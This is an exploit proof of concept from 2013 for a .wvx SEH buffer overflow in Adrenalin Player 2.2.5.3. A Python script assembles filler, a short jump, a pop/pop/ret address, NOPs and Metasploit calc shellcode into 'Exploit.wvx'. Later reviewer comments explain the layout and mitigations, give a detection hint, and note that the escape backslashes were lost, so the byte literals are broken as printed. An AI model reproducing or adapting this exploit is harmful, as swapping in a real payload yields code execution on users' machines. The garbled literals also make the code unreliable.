
# Title : Adrenalin Player 2.2.5.3 (.wvx) - SEH Buffer Overflow
# Published : 2013-07-01
# Author :


#Exploit Title:Adrenalin Player 2.2.5.3 (.wvx) SEH-Buffer Overflow 
#Date:7/1/2013
#Exploit Author:MrXors
#Vendor HomePage:http://software.naver.com/software/summary.nhn?softwareId=MFS_100099
#Software Link:http://software.naver.com/software/summary.nhn?softwareId=MFS_100099
#Version App:2.2.5.3
#Tested on: Windows 7 pro x86 Fully-Patched
#CVE:None
# Proof-of-concept generator: builds one long string and writes it to
# 'Exploit.wvx'. Per the header, the target is the .wvx handling of
# Adrenalin Player 2.2.5.3, and the overflow is used to overwrite an SEH record.
#
# Buffer layout, in the order it is concatenated below:
#   1. 2140 filler characters
#   2. a 4-byte field the author labels "short jmp"
#   3. a 4-byte field the author labels "pop pop ret", taken from an application DLL
#   4. 16 padding characters labelled NOPs
#   5. the payload blob
#
# NOTE(review): the escape sequences on this page appear to have lost their
# backslashes during extraction; as printed, every literal below is plain
# ASCII text ("x41", not a single byte).
#
# Defender notes:
#   - NOTE(review): a "pop pop ret" address inside an application DLL suggests
#     that module is loaded at a fixed base and built without SafeSEH; confirm
#     against the shipped binary. SafeSEH, SEHOP, ASLR and DEP are the
#     mitigations aimed at this class of SEH overwrite.
#   - .wvx is normally a short text metafile, so a multi-kilobyte .wvx with a
#     long run of one repeated character followed by non-text data is a
#     reasonable triage signal for mail/web gateways and endpoint scanning.
#   - The header lists no CVE and gives no fixed version, so nothing here
#     establishes that a patch exists.

# Filler up to the point where the overwritten handler record begins
# (offset 2140, as chosen by the author).
junk="x41"*2140
# Author's label: short jump. It occupies the 4 bytes directly before the
# handler pointer.
junk+="xebx06x90x90"#short jmp
# Author's label: address of a pop/pop/ret sequence inside one of the
# application's own DLLs. It is written where the handler pointer sits.
junk+="x39xb1x14x10"#pop pop ret ***App Dll***
# 16 padding characters placed between the overwritten record and the payload.
junk+='x90'*16#NOPS
# Payload blob. The author describes it as msf-generated shellcode that starts
# calc, encoded to avoid the characters listed after -b.
#Calc shellcode from msf (-b 'x00x0ax0dx0b')
junk+=("xd9xc8xb8xa0x47xcfx09xd9x74x24xf4x5fx2bxc9" +
"xb1x32x31x47x17x83xc7x04x03xe7x54x2dxfcx1b" +
"xb2x38xffxe3x43x5bx89x06x72x49xedx43x27x5d" +
"x65x01xc4x16x2bxb1x5fx5axe4xb6xe8xd1xd2xf9" +
"xe9xd7xdax55x29x79xa7xa7x7ex59x96x68x73x98" +
"xdfx94x7cxc8x88xd3x2fxfdxbdxa1xf3xfcx11xae" +
"x4cx87x14x70x38x3dx16xa0x91x4ax50x58x99x15" +
"x41x59x4ex46xbdx10xfbxbdx35xa3x2dx8cxb6x92" +
"x11x43x89x1bx9cx9dxcdx9bx7fxe8x25xd8x02xeb" +
"xfdxa3xd8x7exe0x03xaaxd9xc0xb2x7fxbfx83xb8" +
"x34xcbxccxdcxcbx18x67xd8x40x9fxa8x69x12x84" +
"x6cx32xc0xa5x35x9exa7xdax26x46x17x7fx2cx64" +
"x4cxf9x6fxe2x93x8bx15x4bx93x93x15xfbxfcxa2" +
"x9ex94x7bx3bx75xd1x7axcax44xcfxebx75x3dxb2" +
"x71x86xebxf0x8fx05x1ex88x6bx15x6bx8dx30x91" +
"x87xffx29x74xa8xacx4ax5dxcbx33xd9x3dx0c")
# Write the assembled string to Exploit.wvx in the current working directory.
# The file contains only this buffer; no playlist markup is added around it.
x=open('Exploit.wvx', 'w')
x.write(junk)
x.close()